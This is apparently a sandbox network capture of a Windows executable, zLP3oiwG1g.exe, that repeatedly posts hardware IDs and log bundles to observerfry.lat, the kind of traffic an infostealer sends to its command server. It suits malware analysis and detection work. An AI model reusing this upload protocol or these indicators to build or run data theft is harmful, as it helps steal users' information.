2024-12-23 07:08:39 UTC | 248 | IN | Data Raw: 34 39 31 63 0d 0a 4e 76 4e 50 77 75 54 34 55 44 38 71 51 69 57 50 36 56 66 65 53 42 64 4a 30 71 2f 47 5a 65 6d 71 50 45 64 34 79 50 61 37 6a 31 42 4e 30 54 6e 67 33 73 78 38 48 56 6b 6e 42 37 57 64 4a 61 73 74 4f 32 75 7a 79 2b 52 66 6a 38 74 51 4e 42 33 6b 31 4d 33 69 63 67 79 56 4c 71 36 58 6e 58 77 64 54 7a 6f 48 74 62 49 73 2f 43 31 35 61 2b 69 4e 6f 77 2b 4c 79 31 41 6c 47 61 4f 5a 79 2b 4d 7a 58 70 38 6f 71 6f 47 62 4e 46 35 47 4c 30 44 71 6a 44 61 30 4a 6e 34 6b 75 73 4c 6b 53 63 76 50 52 6d 56 43 36 72 76 65 2b 7a 46 37 6b 6a 79 70 78 6f 56 38 52 41 67 6e 53 36 33 54 64 62 38 74 64 53 57 30 79 36 30 4e 67 63 4a 59 4a 42 79 69 68 74 4c 70 4f 46 36 52 4b 36 75 4c 6b 69 42 54 54 43 68 4c 37 49 59 32 2f 47 51 31 4c 4b 69 4e 2f 45
Data Ascii: 491cNvNPwuT4UD8qQiWP6VfeSBdJ0q/GZemqPEd4yPa7j1BN0Tng3sx8HVknB7WdJastO2uzy+Rfj8tQNB3k1M3icgyVLq6XnXwdTzoHtbIs/C15a+iNow+Ly1AlGaOZy+MzXp8oqoGbNF5GL0DqjDa0Jn4kusLkScvPRmVC6rve+zF7kjypxoV8RAgnS63Tdb8tdSW0y60NgcJYJByihtLpOF6RK6uLkiBTTChL7IY2/GQ1LKiN/E
2024-12-23 07:08:39 UTC | 1369 | IN | Data Raw: 66 59 2b 6c 30 30 43 37 2b 5a 79 65 74 79 53 39 38 30 34 49 47 57 63 67 55 49 4b 45 76 6a 6a 6a 61 7a 4c 58 51 72 6f 73 4b 6b 42 49 50 41 57 69 38 56 70 5a 76 58 35 7a 56 63 6d 43 71 76 67 5a 49 30 55 6b 74 67 43 61 32 4d 4c 66 78 79 4e 51 75 67 7a 71 63 54 68 74 6b 65 4f 6c 53 7a 31 4e 37 68 63 67 7a 52 4b 36 36 48 6c 7a 4a 50 51 43 74 4d 36 4a 6b 2b 74 53 64 34 4b 37 33 48 71 77 53 4c 7a 31 51 76 46 61 43 51 31 4f 41 30 56 4a 46 74 37 73 61 64 4b 68 30 51 59 47 54 6f 6d 7a 4b 77 50 44 63 52 38 4e 4c 71 48 73 76 50 55 6d 56 43 36 70 7a 63 37 6a 46 66 6e 69 36 6f 6a 59 67 79 54 30 34 74 51 76 2b 4e 4d 4c 49 67 64 6a 6d 36 77 36 49 45 67 73 4e 58 49 42 32 75 31 4a 65 74 4e 55 7a 52 64 65 43 6e 6c 7a 6c 52 51 6a 64 48 72 5a 52 37 70 57 70 79 4a 2f 43 56 35
Data Ascii: fY+l00C7+ZyetyS9804IGWcgUIKEvjjjazLXQrosKkBIPAWi8VpZvX5zVcmCqvgZI0UktgCa2MLfxyNQugzqcThtkeOlSz1N7hcgzRK66HlzJPQCtM6Jk+tSd4K73HqwSLz1QvFaCQ1OA0VJFt7sadKh0QYGTomzKwPDcR8NLqHsvPUmVC6pzc7jFfni6ojYgyT04tQv+NMLIgdjm6w6IEgsNXIB2u1JetNUzRdeCnlzlRQjdHrZR7pWpyJ/CV5
2024-12-23 07:08:39 UTC | 1369 | IN | Data Raw: 65 61 31 71 74 6a 4a 6d 31 63 6e 36 53 4f 61 4f 4d 32 41 64 65 52 69 35 41 2b 38 73 71 38 6a 4d 31 4c 4c 79 4e 2f 45 65 47 79 56 59 6a 43 4b 57 5a 32 75 4d 38 57 35 51 69 71 49 61 61 50 31 68 4d 4b 30 7a 75 68 6a 47 75 49 48 55 6a 74 63 79 75 44 63 75 47 48 69 49 43 36 73 79 5a 33 43 56 66 30 78 69 6a 69 4a 51 31 53 77 67 2f 43 66 54 4c 4d 72 42 71 4c 57 75 39 78 61 45 43 68 4d 6c 55 4b 78 2b 67 6d 4e 48 6a 4d 55 61 65 4b 61 43 4b 6b 6a 68 51 52 69 52 50 35 49 41 2b 75 69 70 30 49 66 43 44 35 41 43 54 69 41 5a 6c 4c 71 32 59 31 4f 4a 77 59 5a 49 6a 72 6f 47 4d 63 6b 49 47 4f 51 66 71 68 33 58 6b 61 6e 6b 69 73 4d 61 75 41 34 76 50 55 79 41 5a 72 5a 66 55 36 6a 68 61 6c 69 6d 73 6a 35 63 30 58 55 38 6b 51 76 2b 4f 50 4c 41 6d 4e 57 58 77 79 72 78 48 30 34
Data Ascii: ea1qtjJm1cn6SOaOM2AdeRi5A+8sq8jM1LLyN/EeGyVYjCKWZ2uM8W5QiqIaaP1hMK0zuhjGuIHUjtcyuDcuGHiIC6syZ3CVf0xijiJQ1Swg/CfTLMrBqLWu9xaEChMlUKx+gmNHjMUaeKaCKkjhQRiRP5IA+uip0IfCD5ACTiAZlLq2Y1OJwYZIjroGMckIGOQfqh3XkankisMauA4vPUyAZrZfU6jhalimsj5c0XU8kQv+OPLAmNWXwyrxH04
2024-12-23 07:08:39 UTC | 1369 | IN | Data Raw: 36 73 79 5a 35 44 74 47 6e 79 4f 70 69 35 77 36 57 6b 59 74 54 4f 75 41 4d 72 73 73 65 43 4f 39 79 4b 63 47 6a 38 4a 4d 4a 68 47 67 6d 64 4f 74 66 42 53 57 4e 65 44 65 32 68 56 52 59 54 42 63 2f 35 31 31 6f 32 52 73 61 37 66 42 35 46 2f 4c 79 31 45 73 46 61 4b 63 31 75 49 32 57 70 63 72 72 59 4f 56 4f 45 39 41 4c 6b 72 6d 68 44 36 75 4b 6e 67 76 76 4d 6d 73 44 49 47 49 45 47 55 64 73 74 53 42 72 51 64 5a 6e 69 32 6a 6b 4e 6f 74 45 31 46 67 51 4f 48 4c 62 66 77 6d 65 79 75 2f 77 61 67 4d 67 38 6c 53 4b 78 32 76 6e 64 48 6c 49 46 57 56 4a 61 47 49 6c 54 4e 5a 54 53 56 44 36 6f 38 7a 73 32 6f 37 61 37 66 56 35 46 2f 4c 35 33 6b 51 57 49 75 75 6d 66 4a 38 54 64 45 71 72 4d 62 43 63 6c 46 4c 4c 45 2f 69 6a 54 79 77 49 48 77 67 76 4d 61 67 43 34 4c 4e 57 43 51
Data Ascii: 6syZ5DtGnyOpi5w6WkYtTOuAMrsseCO9yKcGj8JMJhGgmdOtfBSWNeDe2hVRYTBc/511o2Rsa7fB5F/Ly1EsFaKc1uI2WpcrrYOVOE9ALkrmhD6uKngvvMmsDIGIEGUdstSBrQdZni2jkNotE1FgQOHLbfwmeyu/wagMg8lSKx2vndHlIFWVJaGIlTNZTSVD6o8zs2o7a7fV5F/L53kQWIuumfJ8TdEqrMbCclFLLE/ijTywIHwgvMagC4LNWCQ
2024-12-23 07:08:39 UTC | 1369 | IN | Data Raw: 2b 6f 37 52 70 38 67 72 34 36 53 4f 31 78 4d 4a 55 72 72 68 7a 2b 39 4c 58 73 6c 75 49 33 71 52 34 7a 51 48 6e 31 61 69 34 54 43 2f 79 52 5a 73 43 43 76 78 6f 56 38 52 41 67 6e 53 36 33 54 64 62 55 34 63 53 61 69 78 4b 4d 4a 68 4d 74 4d 4a 42 65 68 68 74 37 69 4e 6c 4f 64 4b 36 2b 41 6d 7a 64 58 52 43 64 43 35 6f 51 35 2f 47 51 31 4c 4b 69 4e 2f 45 65 6c 77 30 30 79 47 61 53 66 7a 2f 5a 79 53 39 38 30 34 49 47 57 63 67 55 49 49 30 7a 6d 6a 7a 57 77 4b 6e 45 6d 73 4e 2b 72 41 49 7a 42 56 54 63 51 72 5a 50 53 35 54 6c 62 6c 7a 2b 73 69 49 67 33 54 31 70 67 43 61 32 4d 4c 66 78 79 4e 52 32 33 33 62 51 45 79 66 6c 49 4a 67 79 68 6d 64 57 74 4c 52 71 49 62 61 65 4b 32 6d 6f 64 54 69 39 4f 37 6f 51 30 74 53 5a 34 4c 72 6e 49 70 51 47 50 77 6c 51 6c 48 4b 79 56
Data Ascii: +o7Rp8gr46SO1xMJUrrhz+9LXsluI3qR4zQHn1ai4TC/yRZsCCvxoV8RAgnS63TdbU4cSaixKMJhMtMJBehht7iNlOdK6+AmzdXRCdC5oQ5/GQ1LKiN/Eelw00yGaSfz/ZyS9804IGWcgUII0zmjzWwKnEmsN+rAIzBVTcQrZPS5Tlblz+siIg3T1pgCa2MLfxyNR233bQEyflIJgyhmdWtLRqIbaeK2modTi9O7oQ0tSZ4LrnIpQGPwlQlHKyV
2024-12-23 07:08:39 UTC | 1369 | IN | Data Raw: 53 57 49 65 44 65 32 6a 46 61 53 79 46 4e 35 49 63 36 75 79 35 6e 49 62 66 66 70 51 61 41 78 56 49 6c 46 36 65 65 32 4f 51 2f 57 4a 77 71 70 34 6d 66 63 68 4d 49 4a 31 2b 74 30 33 57 64 4a 33 34 6e 36 35 66 6b 47 4d 58 52 48 69 49 57 36 73 79 5a 37 54 68 52 6d 79 43 6a 69 5a 6b 67 58 45 34 79 52 2b 43 42 4a 37 59 68 63 43 61 39 77 4b 63 42 6a 63 4e 53 4e 78 4f 71 6c 39 4b 74 66 42 53 57 4e 65 44 65 32 68 46 4b 58 69 70 41 34 5a 30 2b 76 53 6c 6a 4a 71 43 4e 36 6b 65 61 7a 30 39 6c 51 72 79 45 7a 75 6f 74 47 6f 68 74 70 34 72 61 61 68 31 4f 4b 55 48 71 6a 54 75 75 4c 33 4d 6b 76 38 53 74 41 34 50 4c 58 69 45 65 72 5a 48 61 34 54 6c 54 6b 69 4b 6b 6a 35 51 37 55 67 68 75 42 2b 71 54 64 65 52 71 56 44 43 7a 77 61 6c 48 6c 49 5a 48 5a 52 32 6d 31 49 47 74 50
Data Ascii: SWIeDe2jFaSyFN5Ic6uy5nIbffpQaAxVIlF6ee2OQ/WJwqp4mfchMIJ1+t03WdJ34n65fkGMXRHiIW6syZ7ThRmyCjiZkgXE4yR+CBJ7YhcCa9wKcBjcNSNxOql9KtfBSWNeDe2hFKXipA4Z0+vSljJqCN6keaz09lQryEzuotGohtp4raah1OKUHqjTuuL3Mkv8StA4PLXiEerZHa4TlTkiKkj5Q7UghuB+qTdeRqVDCzwalHlIZHZR2m1IGtP
2024-12-23 07:08:39 UTC | 1369 | IN | Data Raw: 72 6b 4a 38 31 53 77 6f 56 52 4f 4f 46 4d 71 70 71 61 68 54 2b 6a 61 73 64 79 35 42 6e 50 46 71 74 6d 4a 6d 31 63 6b 47 57 4c 61 65 63 6a 44 56 52 57 53 74 4b 34 61 6b 36 75 7a 78 32 4a 4c 50 63 72 55 75 41 78 52 35 72 57 71 32 4d 6d 62 56 79 65 35 59 37 6f 36 6d 5a 49 31 51 49 62 67 66 71 6e 58 58 6b 61 6b 74 72 6f 73 36 30 42 49 54 5a 59 47 56 43 73 36 71 5a 35 69 52 54 67 53 36 32 6a 5a 63 2b 54 48 5a 67 48 37 6e 5a 5a 2b 35 34 4a 7a 54 77 30 70 74 4a 79 38 6b 65 66 53 4f 7a 31 4d 2b 74 61 67 62 66 62 62 4c 47 77 6e 49 61 53 7a 4a 56 36 34 67 6a 76 32 31 4c 46 5a 66 62 72 67 43 62 7a 30 6b 71 57 75 54 55 31 71 31 71 62 64 45 6b 70 35 32 4c 4a 46 42 59 4a 77 66 53 78 58 57 6b 61 69 31 72 68 63 36 71 43 59 7a 65 54 32 67 39 76 4a 37 65 2f 54 56 44 6e 6d
Data Ascii: rkJ81SwoVROOFMqpqahT+jasdy5BnPFqtmJm1ckGWLaecjDVRWStK4ak6uzx2JLPcrUuAxR5rWq2MmbVye5Y7o6mZI1QIbgfqnXXkaktros60BITZYGVCs6qZ5iRTgS62jZc+THZgH7nZZ+54JzTw0ptJy8kefSOz1M+tagbfbbLGwnIaSzJV64gjv21LFZfbrgCbz0kqWuTU1q1qbdEkp52LJFBYJwfSxXWkai1rhc6qCYzeT2g9vJ7e/TVDnm
2024-12-23 07:08:39 UTC | 1369 | IN | Data Raw: 4f 56 31 50 4d 46 48 32 78 7a 32 2f 4d 47 38 56 6a 75 61 6f 41 59 7a 53 57 53 4d 38 69 74 53 58 72 54 30 55 79 52 54 67 7a 74 6f 4e 45 77 67 34 42 37 58 4c 41 4c 38 6b 65 79 79 6d 33 4f 6b 76 71 50 4a 6b 5a 7a 61 74 67 5a 76 5a 4e 55 53 41 4a 71 32 4b 32 6e 77 64 54 6d 41 66 76 63 56 31 75 44 73 31 63 2b 43 66 2f 31 4c 59 6e 77 35 33 42 65 53 4e 6d 66 74 79 44 4d 4e 6a 34 4a 54 61 61 68 30 50 49 31 58 2f 6a 54 61 71 4b 54 49 56 6a 75 71 71 41 49 72 65 54 6a 49 56 6c 4b 72 4d 37 6a 78 61 6c 6a 75 78 78 74 52 79 55 67 68 34 66 71 33 44 64 59 4e 6b 4e 54 50 77 6c 65 51 79 69 4d 5a 51 49 67 79 37 32 66 37 6a 4e 56 57 48 50 62 65 4a 32 6e 77 64 54 6d 41 66 76 38 56 31 75 44 73 31 63 2b 43 66 2f 31 4c 59 6e 77 35 33 42 65 53 4e 6d 66 74 79 44 4d 4e 6a 34 4a 54
                                                                                                                                                                              2024-12-23 07:08:39 UTC1369INData Raw: 4f 56 31 50 4d 46 48 32 78 7a 32 2f 4d 47 38 56 6a 75 61 6f 41 59 7a 53 57 53 4d 38 69 74 53 58 72 54 30 55 79 52 54 67 7a 74 6f 4e 45 77 67 34 42 37 58 4c 41 4c 38 6b 65 79 79 6d 33 4f 6b 76 71 50 4a 6b 5a 7a 61 74 67 5a 76 5a 4e 55 53 41 4a 71 32 4b 32 6e 77 64 54 6d 41 66 76 63 56 31 75 44 73 31 63 2b 43 66 2f 31 4c 59 6e 77 35 33 42 65 53 4e 6d 66 74 79 44 4d 4e 6a 34 4a 54 61 61 68 30 50 49 31 58 2f 6a 54 61 71 4b 54 49 56 6a 75 71 71 41 49 72 65 54 6a 49 56 6c 4b 72 4d 37 6a 78 61 6c 6a 75 78 78 74 52 79 55 67 68 34 66 71 33 44 64 59 4e 6b 4e 54 50 77 6c 65 51 79 69 4d 5a 51 49 67 79 37 32 66 37 6a 4e 56 57 48 50 62 65 4a 32 6e 77 64 54 6d 41 66 76 38 56 31 75 44 73 31 63 2b 43 66 2f 31 4c 59 6e 77 35 33 42 65 53 4e 6d 66 74 79 44 4d 4e 6a 34 4a 54
                                                                                                                                                                              Data Ascii: OV1PMFH2xz2/MG8VjuaoAYzSWSM8itSXrT0UyRTgztoNEwg4B7XLAL8keyym3OkvqPJkZzatgZvZNUSAJq2K2nwdTmAfvcV1uDs1c+Cf/1LYnw53BeSNmftyDMNj4JTaah0PI1X/jTaqKTIVjuqqAIreTjIVlKrM7jxaljuxxtRyUgh4fq3DdYNkNTPwleQyiMZQIgy72f7jNVWHPbeJ2nwdTmAfv8V1uDs1c+Cf/1LYnw53BeSNmftyDMNj4JT
                                                                                                                                                                              2024-12-23 07:08:39 UTC1369INData Raw: 7a 5a 45 72 63 56 31 73 47 6f 74 61 37 48 48 74 41 71 45 7a 78 49 69 41 4b 33 55 6c 36 30 38 46 4d 6c 74 6f 59 79 4b 50 31 4a 50 62 45 48 6a 68 58 57 6a 5a 47 78 72 70 6f 33 38 56 4d 57 49 54 47 56 43 36 74 50 61 2f 79 42 53 6b 6a 75 6a 77 61 51 4d 63 46 6f 6e 56 2b 37 4a 42 4c 45 75 59 7a 36 7a 33 61 4d 35 74 65 56 4d 49 67 71 70 31 75 6a 37 4d 56 53 66 4b 75 44 49 32 69 6f 64 45 47 42 71 2f 34 77 6c 76 32 6f 37 61 37 79 4e 2f 45 65 47 32 6c 6b 31 47 65 61 54 77 2b 70 79 53 39 38 30 34 4a 44 61 61 67 34 47 59 46 57 74 30 33 58 37 4a 48 67 71 73 38 4f 6e 46 5a 6e 4f 58 54 4d 5a 37 61 72 6e 77 43 42 54 67 53 37 69 74 35 63 32 53 31 30 6a 56 2b 71 31 43 35 45 34 63 6a 75 7a 6a 34 67 41 68 73 52 67 47 79 32 37 6b 38 6d 76 46 46 65 48 4c 75 44 49 32 69 6f 64
                                                                                                                                                                              Data Ascii: zZErcV1sGota7HHtAqEzxIiAK3Ul608FMltoYyKP1JPbEHjhXWjZGxrpo38VMWITGVC6tPa/yBSkjujwaQMcFonV+7JBLEuYz6z3aM5teVMIgqp1uj7MVSfKuDI2iodEGBq/4wlv2o7a7yN/EeG2lk1GeaTw+pyS9804JDaag4GYFWt03X7JHgqs8OnFZnOXTMZ7arnwCBTgS7it5c2S10jV+q1C5E4cjuzj4gAhsRgGy27k8mvFFeHLuDI2iod


Session ID 2: Source 192.168.2.10:49725 -> Destination 104.21.36.201:443, PID 7300, Process C:\Users\user\Desktop\zLP3oiwG1g.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-23 07:08:41 UTC  278  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=7KS519323WMYJSP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12835
Host: observerfry.lat
2024-12-23 07:08:41 UTC  12835  OUT  Data Ascii (truncated; raw hex dump omitted):
--7KS519323WMYJSP
Content-Disposition: form-data; name="hwid"

658647DBBE9C2D86AC8923850305D13E
--7KS519323WMYJSP
Content-Disposition: form-data; name="pid"

2
--7KS519323WMYJSP
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
-
2024-12-23 07:08:42 UTC  1128  IN  HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:08:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=el7rfvb0rnghv1m4om37k2a8n6; expires=Fri, 18 Apr 2025 00:55:20 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BDbRlHM27k3Tserk3vAqrf4oFRjkoIbW37hNBKBGmWSIEJgVLzTr1yadRNJYTVGdTfgwm099JbWdMqqDCW09QRsaCxIoUaJO5j7WppdXYPhuZEQvWsNapHFDBD5%2B%2FbbsMxA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f668597a84f17a9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1690&rtt_var=642&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13771&delivery_rate=1694718&cwnd=238&unsent_bytes=0&cid=705f1fdd930686ff&ts=1086&x=0"
2024-12-23 07:08:42 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:08:42 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID 3: Source 192.168.2.10:49731 -> Destination 104.21.36.201:443, PID 7300, Process C:\Users\user\Desktop\zLP3oiwG1g.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-23 07:08:44 UTC  273  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=F9JM2P9ZQQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15032
Host: observerfry.lat
2024-12-23 07:08:44 UTC  15032  OUT  Data Ascii (truncated; raw hex dump omitted):
--F9JM2P9ZQQ
Content-Disposition: form-data; name="hwid"

658647DBBE9C2D86AC8923850305D13E
--F9JM2P9ZQQ
Content-Disposition: form-data; name="pid"

2
--F9JM2P9ZQQ
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--F9JM2P9ZQQ
Co
2024-12-23 07:08:44 UTC  1129  IN  HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:08:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=crtv6ic1l087lih297eeeelk65; expires=Fri, 18 Apr 2025 00:55:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CYz3%2F8IvdcIUjmEpEhaNDb1mlZMHGcZSuIbWT7KhzvfjliZ%2FG9A0DLMdvB9bmt2QNCsUgKOyZAYrs6NWKsd%2Fla5cf1UJhtIfVp%2FoyapRxLsloxvy327Ih0YObYbT72FhPQA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6685a89f7a42be-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1731&min_rtt=1721&rtt_var=667&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15963&delivery_rate=1615938&cwnd=213&unsent_bytes=0&cid=1a8727e2f75b585f&ts=914&x=0"
2024-12-23 07:08:44 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:08:44 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID 4: Source 192.168.2.10:49737 -> Destination 104.21.36.201:443, PID 7300, Process C:\Users\user\Desktop\zLP3oiwG1g.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-23 07:08:46 UTC  275  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=W15LETL8XXHB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20406
Host: observerfry.lat
2024-12-23 07:08:46 UTC  15331  OUT  Data Ascii (truncated; raw hex dump omitted):
--W15LETL8XXHB
Content-Disposition: form-data; name="hwid"

658647DBBE9C2D86AC8923850305D13E
--W15LETL8XXHB
Content-Disposition: form-data; name="pid"

3
--W15LETL8XXHB
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--W15LETL8
2024-12-23 07:08:46 UTC  5075  OUT  Data: binary, non-printable payload (raw hex and ASCII dump omitted)
2024-12-23 07:08:47 UTC  1135  IN  HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:08:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=tpbk2hqp4h8enhk373qcnvrprd; expires=Fri, 18 Apr 2025 00:55:26 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=flaPlgMzyKTtHuTwsk3H4%2BnSu%2BKqhL%2BTvD54c%2FQjPyRHVcTvz88j17idftlUby%2BOhjn%2Fl6W8d83rcppobuxfEfB9JHRF5QrMwbi5whC2x%2B8Rz4YLNJH6SNR9Aw2x8mYzZRw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6685b72eacc45e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1622&rtt_var=625&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21361&delivery_rate=1728833&cwnd=243&unsent_bytes=0&cid=12f90d277d35049c&ts=983&x=0"
2024-12-23 07:08:47 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:08:47 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49743 | 104.21.36.201 | 443 | 7300 | C:\Users\user\Desktop\zLP3oiwG1g.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:08:49 UTC | 274 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=DDMTGP5F02YW
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1227
    Host: observerfry.lat
2024-12-23 07:08:49 UTC | 1227 | OUT | Data Raw: 2d 2d 44 44 4d 54 47 50 35 46 30 32 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 36 34 37 44 42 42 45 39 43 32 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 44 44 4d 54 47 50 35 46 30 32 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 44 4d 54 47 50 35 46 30 32 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 44 4d 54 47 50 35 46
    Data Ascii: --DDMTGP5F02YWContent-Disposition: form-data; name="hwid"658647DBBE9C2D86AC8923850305D13E--DDMTGP5F02YWContent-Disposition: form-data; name="pid"1--DDMTGP5F02YWContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--DDMTGP5F
2024-12-23 07:08:49 UTC | 1122 | IN | HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 07:08:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=fmsf31nhpmlfd15fsjhigh628h; expires=Fri, 18 Apr 2025 00:55:28 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LhV2YbA9vdsPkn%2Fo3NuZGxXtMSJI2CNnggcgLPavHPGXlq2FQD0hTxx3lKyZrwegJVmeRf8QtKPtQg2hDIUfz1Oh2kDdjLf5sl2HMsmScODQICb7gHoPfzH%2BefnWcV9dq8%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f6685c7790f80df-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1664&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2137&delivery_rate=1659090&cwnd=215&unsent_bytes=0&cid=e8991a28fb07a78d&ts=785&x=0"
2024-12-23 07:08:49 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-23 07:08:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49751 | 104.21.36.201 | 443 | 7300 | C:\Users\user\Desktop\zLP3oiwG1g.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:08:51 UTC | 275 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=15G7M9X12XX
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 552953
    Host: observerfry.lat
